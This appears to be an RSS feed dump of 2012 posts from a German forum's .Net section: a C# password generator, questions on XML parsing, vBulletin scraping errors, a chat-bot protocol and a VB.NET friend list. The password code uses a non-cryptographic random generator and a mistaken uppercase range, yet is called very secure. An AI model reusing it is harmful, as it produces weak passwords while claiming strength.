/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;switch&nbsp;(</span><span style="color: #0000BB">rnd</span><span style="color: #007700">.</span><span style="color: #0000BB">Next</span><span style="color: #007700">(</span><span style="color: #0000BB">4</span><span style="color: #007700">))&nbsp;</span><span style="color: #FF8000">//Zufällig&nbsp;auswählen&nbsp;zwischen&nbsp;Groß-&nbsp;und&nbsp;Kleinbuchstaben&nbsp;sowie&nbsp;Zahlen&nbsp;und&nbsp;Sonderzeichen!<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">:&nbsp;</span><span style="color: #FF8000">//A-Z<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">generatedChar&nbsp;</span><span style="color: #007700">=&nbsp;(</span><span style="color: #0000BB">char</span><span style="color: #007700">)</span><span style="color: #0000BB">rnd</span><span style="color: #007700">.</span><span style="color: #0000BB">Next</span><span style="color: #007700">(</span><span style="color: #0000BB">0x51</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">0x5B</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">:</span><span style="color: #FF8000">//a-z<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">generatedChar&nbsp;</span><span style="color: #007700">=&nbsp;(</span><span style="color: #0000BB">char</span><span style="color: #007700">)</span><span style="color: #0000BB">rnd</span><span style="color: #007700">.</span><span style="color: #0000BB">Next</span><span style="color: #007700">(</span><span style="color: #0000BB">0x61</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">0x7B</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;case&nbsp;</span><span style="color: #0000BB">2</span><span style="color: #007700">:&nbsp;</span><span style="color: #FF8000">//0-9<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">generatedChar&nbsp;</span><span style="color: #007700">=&nbsp;(</span><span style="color: #0000BB">char</span><span style="color: #007700">)</span><span style="color: #0000BB">rnd</span><span style="color: #007700">.</span><span style="color: #0000BB">Next</span><span style="color: #007700">(</span><span style="color: #0000BB">0x30</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">0x3A</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;default:&nbsp;</span><span style="color: #FF8000">//Sonderzeichen<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">generatedChar&nbsp;</span><span style="color: #007700">=&nbsp;(</span><span style="color: #0000BB">char</span><span style="color: #007700">)</span><span style="color: #0000BB">rnd</span><span style="color: #007700">.</span><span style="color: #0000BB">Next</span><span style="color: #007700">(</span><span style="color: #0000BB">0x21</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">0x41</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;(</span><span style="color: #0000BB">generatedChar&nbsp;</span><span style="color: #007700">&gt;=&nbsp;</span><span style="color: #0000BB">0x30&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">generatedChar&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">0x3A</span><span style="color: #007700">)&nbsp;</span><span style="color: #FF8000">//Keine&nbsp;Zahlen&nbsp;bei&nbsp;Sonderzeichen!!<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">generatedChar&nbsp;</span><span style="color: #007700">=&nbsp;(</span><span style="color: #0000BB">char</span><span style="color: #007700">)</span><span style="color: #0000BB">rnd</span><span style="color: #007700">.</span><span style="color: #0000BB">Next</span><span style="color: #007700">(</span><span style="color: #0000BB">0x21</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">0x41</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(</span><span style="color: #0000BB">generatedChar&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #0000BB">lastChar</span><span style="color: #007700">)&nbsp;</span><span style="color: #FF8000">//Verhindern&nbsp;das&nbsp;der&nbsp;generierte&nbsp;Char&nbsp;dem&nbsp;alten&nbsp;entspricht<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">i</span><span style="color: #007700">--;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">password</span><span style="color: #007700">.</span><span style="color: #0000BB">Append</span><span style="color: #007700">(</span><span style="color: #0000BB">generatedChar</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">lastChar&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">generatedChar</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;</span><span style="color: #0000BB">password</span><span style="color: #007700">.</span><span style="color: #0000BB">ToString</span><span style="color: #007700">();<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Generiert:<br />
<ul><li style="">Ein Passwort in der gewünschten Länge, welches den Richtlinien von DMW entspricht</li><li style="">Ein Passwort, welches keine hintereinander wiederholende Zeichen hat</li><li style="">Ein Passwort mit Sonderzeichen, Zahlen und Groß- sowie Kleinbuchstaben</li></ul><br />
<br />
Es ist für mich persönlich klar, dass dieses Passwort dann am Besten in einem PasswortSafe gespeichert werden sollte, weil es sich nicht einfach merken lässt aber laut der <a href="http://howsecureismypassword.net/" target="_blank" rel="nofollow">How Secure Is My Password?</a> - Website ist das Passwort dafür auch sehr sicher!<br />
<br />
#XChunk</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>XChunk</dc:creator>
			<guid isPermaLink="true">net-94/generatesecurepassword-15452</guid>
		</item>
		<item>
			<title>C# Vorschläge</title>
			<link>net-94/vorschlaege-15364?goto=newpost</link>
			<pubDate>Sat, 04 Aug 2012 09:07:14 GMT</pubDate>
			<description>Moin, wollte mal wieder was in C# coden, suche Ideen, egal was. 
Sollte ein größeres Projekt werden. 
 
LG :)</description>
			<content:encoded><![CDATA[<div>Moin, wollte mal wieder was in C# coden, suche Ideen, egal was.<br />
Sollte ein größeres Projekt werden.<br />
<br />
LG :)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Snees</dc:creator>
			<guid isPermaLink="true">net-94/vorschlaege-15364</guid>
		</item>
		<item>
			<title>VB.Net Streams auslesen lassen - Wie?</title>
			<link>net-94/streams-auslesen-lassen-wie-15290?goto=newpost</link>
			<pubDate>Wed, 01 Aug 2012 20:51:21 GMT</pubDate>
			<description>Hallo U-Hacks-Suchtys, 
 
ich versuche die ganze Zeit schon es hinzubekommen, das man endlich Streams von verschiedenen Radios auslesen kann, nun ist...</description>
			<content:encoded><![CDATA[<div>Hallo U-Hacks-Suchtys,<br />
<br />
ich versuche die ganze Zeit schon es hinzubekommen, das man endlich Streams von verschiedenen Radios auslesen kann, nun ist das Problem, ich hab den Sourcecode nicht mehr im Kopf sowie nicht mehr aufm Rechner,<br />
<br />
Hatte es einmal hinbekommen, das es ein Stream ausliest,<br />
<br />
Jetzt suche und suche ich vergeblich, ich weiß jetzt nicht ob man über eine XML-URL die Streams ausliest, oder anders.<br />
<br />
Kann mir jemand auf die Sprünge helfen?<br />
<br />
Wäre sehr nett :-)<br />
<br />
/e vergessen zu erwähnen das ich gezielt Sachen aus der XML auslesen will also z.B: von <a href="http://tray.technobase.fm/radio.xml" target="_blank" rel="nofollow">http://tray.technobase.fm/radio.xml</a><br />
<br />
Folgende sachen auslesen:<br />
<br />
&lt;artist&gt;XXX&lt;/artist&gt;<br />
&lt;song&gt;XX&lt;/song&gt;<br />
&lt;moderator&gt;Xx&lt;/moderator&gt;<br />
<br />
und vlt. noch in einer Anderen Box Listener für TB z.B.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bazs</dc:creator>
			<guid isPermaLink="true">net-94/streams-auslesen-lassen-wie-15290</guid>
		</item>
		<item>
			<title>C# vBullentin API Problem</title>
			<link>net-94/vbullentin-api-problem-15185?goto=newpost</link>
			<pubDate>Mon, 30 Jul 2012 14:45:53 GMT</pubDate>
			<description>Hallo, 
 
Ich hab ein riesen Problem, undzwar möchte ich eine DLL coden, welche alle nötigen User Infos ausliest.  
 
Ich bekomme folgenden Error:  
...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
Ich hab ein riesen Problem, undzwar möchte ich eine DLL coden, welche alle nötigen User Infos ausliest. <br />
<br />
Ich bekomme folgenden Error: <br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Dein Seitenaufruf konnte aufgrund eines fehlenden Securitytokens nicht verarbeitet werden.<br />
<br />
Wenn du meinst, dass es sich dabei um einen Fehler handelt, wende dich bitte an den Administrator und beschreibe genau, was du gemacht hast, bevor diese Meldung angezeigt wurde.</code><hr />
</div>Ich hab schon mit Live HTTP Headers alles geloggt, ich sende nur irgendeinen Cookie welcher im Cookiecontainer vorhanden ist. Ansonsten wird nichts übertragen. Hatte jemand schon mal das Problem und kann mir helfen?<br />
<br />
Danke schon mal im Vorraus.<br />
<br />
PS:  Ich versuche die Seite vom Benutzer(wo man Profilnachrichten etc. findet) aufzurufen.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>rVs14</dc:creator>
			<guid isPermaLink="true">net-94/vbullentin-api-problem-15185</guid>
		</item>
		<item>
			<title>VB.Net KNLib Billard Problem</title>
			<link>net-94/knlib-billard-problem-15085?goto=newpost</link>
			<pubDate>Thu, 26 Jul 2012 22:13:08 GMT</pubDate>
			<description>Moin, 
 
jo ich versuche mit der KNLib ein Billard Spiel zu beginnen, ich bin soweit das es den angegeben Nick in den erstellen 
Billard Channel...</description>
			<content:encoded><![CDATA[<div>Moin,<br />
<br />
jo ich versuche mit der KNLib ein Billard Spiel zu beginnen, ich bin soweit das es den angegeben Nick in den erstellen<br />
Billard Channel einlädt aber danach kommt <b><u>nicht</u></b> das PopUp:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">k</span><span style="color: #007700">\</span><span style="color: #0000BB">0Billard&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Frageõsivõ67281õf</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0h¾¼ûãEl&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;õcgFh¾¼ûãWl&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;õcgFh¾¼ûãCpBNpBNl&nbsp;õcgFh¾¼ûãClBillard&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">FrageõblgSf</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0hååÿãSl&nbsp;õcgFh¾¼ûããCc</span><span style="color: #FF8000">#Es&nbsp;sind&nbsp;alle&nbsp;notwendigen&nbsp;Spieler&nbsp;an&nbsp;Bord,&nbsp;möchtest&nbsp;du&nbsp;das&nbsp;Spiel&nbsp;starten?##Alternativ&nbsp;kannst&nbsp;du&nbsp;auch&nbsp;_/billard&nbsp;start_&nbsp;eingeben.õs\0úf\0\0\0h¾¼ûipics/cloudsblue.gifõ\0ãSpFb&nbsp;&nbsp;Ja&nbsp;&nbsp;õsdpk&nbsp;&nbsp;Ja&nbsp;&nbsp;õgMf\0\0\0h¾¼ûãb&nbsp;Nein&nbsp;õsdpk&nbsp;Nein&nbsp;õgMf\0\0\0h¾¼ûãbCloseõdpgMf\0\0\0h¾¼ûãããã&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div><br />
Es kommt nach einiger Zeit dieser Fehler:<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">k</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">&#91;</span><span style="color: #0000BB">B</span><span style="color: #007700">&#93;</span><span style="color: #0000BB">Billard&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Problem</span><span style="color: #007700">&#91;/</span><span style="color: #0000BB">B</span><span style="color: #007700">&#93;</span><span style="color: #0000BB">õf</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0hÿÿÿãp</span><span style="color: #007700">~</span><span style="color: #0000BB">õbÿÿÿBNp</span><span style="color: #007700">~</span><span style="color: #0000BB">õbÿÿÿU</span><span style="color: #007700">-</span><span style="color: #0000BB">õU</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0<br />BãSp</span><span style="color: #007700">~</span><span style="color: #0000BB">õbëëÿU</span><span style="color: #007700">-</span><span style="color: #0000BB">õU</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0<br />BãCp</span><span style="color: #007700">~</span><span style="color: #0000BB">õBSp</span><span style="color: #007700">~</span><span style="color: #0000BB">õbëëÿGBBBBp</span><span style="color: #007700">~</span><span style="color: #0000BB">õbëëÿFp</span><span style="color: #007700">~</span><span style="color: #0000BB">õGABBBp</span><span style="color: #007700">~</span><span style="color: #0000BB">õbëëÿBCb&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;OK&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;õcedbgOhÿÿÿãEp</span><span style="color: #007700">~</span><span style="color: #0000BB">õbëëÿU</span><span style="color: #007700">-</span><span style="color: #0000BB">õU</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0BãWp</span><span style="color: #007700">~</span><span style="color: #0000BB">õbëëÿU</span><span style="color: #007700">-</span><span style="color: #0000BB">õU</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0BãããããCp</span><span style="color: #007700">~</span><span style="color: #0000BB">õBNpBNpBWpUpics</span><span style="color: #007700">/</span><span style="color: #0000BB">layout</span><span style="color: #007700">/</span><span style="color: #0000BB">boxS_tl</span><span style="color: #007700">.</span><span style="color: #0000BB">pngõU</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0BãCpUpics</span><span style="color: #007700">/</span><span style="color: #0000BB">layout</span><span style="color: #007700">/</span><span style="color: #0000BB">boxS_tc</span><span style="color: #007700">.</span><span style="color: #0000BB">pngõU</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0BãEpUpics</span><span style="color: #007700">/</span><span style="color: #0000BB">layout</span><span style="color: #007700">/</span><span style="color: #0000BB">boxS_tr</span><span style="color: #007700">.</span><span style="color: #0000BB">pngõU</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0BããWpUpics</span><span style="color: #007700">/</span><span style="color: #0000BB">layout</span><span style="color: #007700">/</span><span style="color: #0000BB">boxS_cl</span><span style="color: #007700">.</span><span style="color: #0000BB">pngõU</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0BãEpUpics</span><span style="color: #007700">/</span><span style="color: #0000BB">layout</span><span style="color: #007700">/</span><span style="color: #0000BB">boxS_cr</span><span style="color: #007700">.</span><span style="color: #0000BB">pngõU</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0BãSpBWpUpics</span><span style="color: #007700">/</span><span style="color: #0000BB">layout</span><span style="color: #007700">/</span><span style="color: #0000BB">boxS_bl</span><span style="color: #007700">.</span><span style="color: #0000BB">pngõU</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0BãCpUpics</span><span style="color: #007700">/</span><span style="color: #0000BB">layout</span><span style="color: #007700">/</span><span style="color: #0000BB">boxS_bc</span><span style="color: #007700">.</span><span style="color: #0000BB">pngõU</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0BãEpUpics</span><span style="color: #007700">/</span><span style="color: #0000BB">layout</span><span style="color: #007700">/</span><span style="color: #0000BB">boxS_br</span><span style="color: #007700">.</span><span style="color: #0000BB">pngõU</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0BããCp</span><span style="color: #007700">~</span><span style="color: #0000BB">õGABBBp</span><span style="color: #007700">~</span><span style="color: #0000BB">õBCcõf</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0hÞÞÿãWlBillard&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">ProblemõbgUf</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0hÞÞÿããããCp</span><span style="color: #007700">~</span><span style="color: #0000BB">õBCp</span><span style="color: #007700">~</span><span style="color: #0000BB">õBNp</span><span style="color: #007700">~</span><span style="color: #0000BB">õU</span><span style="color: #007700">-</span><span style="color: #0000BB">õU</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0BãSp</span><span style="color: #007700">~</span><span style="color: #0000BB">õbëëÿU</span><span style="color: #007700">-</span><span style="color: #0000BB">õU</span><span style="color: #007700">\</span><span style="color: #0000BB">0</span><span style="color: #007700">\</span><span style="color: #0000BB">0BãCp</span><span style="color: #007700">~</span><span style="color: #0000BB">õBCc°R</span><span style="color: #007700">&gt;{</span><span style="color: #0000BB">linkhovercolor</span><span style="color: #007700">}&lt;</span><span style="color: #0000BB">r°Bei&nbsp;folgenden&nbsp;Spielern&nbsp;gab&nbsp;es&nbsp;Probleme&nbsp;beim&nbsp;Aufbau&nbsp;des&nbsp;Billardtisches</span><span style="color: #007700">:</span><span style="color: #FF8000">##NICK1,&nbsp;NICK2,&nbsp;°&gt;{linkhovercolorreset}&lt;°õ~tpõs\0úf\0\0\0hÿÿÿipics/layout/bg_trend.pngõÿÿããEp~õUpics/layout/bg_trend.pngõU\0\0BãWp~õUpics/layout/bg_trend.pngõU\0\0BãããããEp~õbÿÿÿUpics/layout/bg_trend.pngõU\0<br /></span><span style="color: #007700">\</span><span style="color: #0000BB">0BãWp</span><span style="color: #007700">~</span><span style="color: #0000BB">õbÿÿÿUpics</span><span style="color: #007700">/</span><span style="color: #0000BB">layout</span><span style="color: #007700">/</span><span style="color: #0000BB">bg_trend</span><span style="color: #007700">.</span><span style="color: #0000BB">pngõU</span><span style="color: #007700">\</span><span style="color: #0000BB">0<br /></span><span style="color: #007700">\</span><span style="color: #0000BB">0Bããã&nbsp;<br /></span>
</span>
</code></code><hr />
</div>Ich bin mir eigt. sicher das der erste Nick wo das Spiel erstellt den zweiten Nick richtig annimmt sonst würde dieser ja nicht<br />
in den erstellten Billard Channel wechseln aber wie oben geschrieben kommt nicht das PopUp das es starten kann.<br />
<br />
Mfg DBZFreak</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Dbzfreak1337</dc:creator>
			<guid isPermaLink="true">net-94/knlib-billard-problem-15085</guid>
		</item>
		<item>
			<title>VB.Net VB.net - 2 Probleme</title>
			<link>net-94/vb-net-2-probleme-14863?goto=newpost</link>
			<pubDate>Wed, 18 Jul 2012 13:13:27 GMT</pubDate>
			<description><![CDATA[Hey U-Hacks, 
 
und zwar bin ich gerade für'n Kollegen ein simples kleines Programm am machen mit dem von einer Website Freunde in eine Listbox adden...]]></description>
			<content:encoded><![CDATA[<div>Hey U-Hacks,<br />
<br />
und zwar bin ich gerade für'n Kollegen ein simples kleines Programm am machen mit dem von einer Website Freunde in eine Listbox adden und auch wieder entfernen kann.<br />
<br />
Das Programm speichert die Freunde auch schon, etc. Man kommt auch aufs Profil wenn man in der Listbox auf den Namen drückt.<br />
<br />
So dann kommen wir auch gleich mal zu meinem ersten Problem:<br />
<br />
Und zwar möchte ich erst ein Profil öffnen, wenn man Doppelklick auf den Namen macht.<br />
Ich habe gestern schon alles probiert, auch die Ereignisse durchschaut aber nichts passendes gefunden.<br />
<br />
Kommen wir zum zweiten Problem:<br />
<br />
Ich möchte auf der Website den Userstatus abfragen (Ob online oder offline).<br />
Habe auch schon den Container gefunden, wo ich das abfragen kann.<br />
<br />
Dieser ist so aufgebaut:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">&lt;</span><span style="color: #0000BB">span&nbsp;id</span><span style="color: #007700">=</span><span style="color: #DD0000">"userstatus"</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">span&nbsp;style</span><span style="color: #007700">=</span><span style="color: #DD0000">"font-family:Arial;font-size:16px;"&nbsp;</span><span style="color: #0000BB">name</span><span style="color: #007700">=</span><span style="color: #DD0000">"userID"</span><span style="color: #007700">&gt;</span><span style="color: #0000BB">USERNAME</span><span style="color: #007700">&lt;/</span><span style="color: #0000BB">span</span><span style="color: #007700">&gt;&nbsp;</span><span style="color: #0000BB">is&nbsp;offline<br /></span><span style="color: #007700">&lt;/</span><span style="color: #0000BB">span</span><span style="color: #007700">&gt;&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Habe es dort mit:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">WebBrowser1</span><span style="color: #007700">.</span><span style="color: #0000BB">Document</span><span style="color: #007700">.</span><span style="color: #0000BB">GetElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">"video_container"</span><span style="color: #007700">).</span><span style="color: #0000BB">InnerText</span><span style="color: #007700">.</span><span style="color: #0000BB">Contains</span><span style="color: #007700">(</span><span style="color: #DD0000">"is&nbsp;offline"</span><span style="color: #007700">)&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
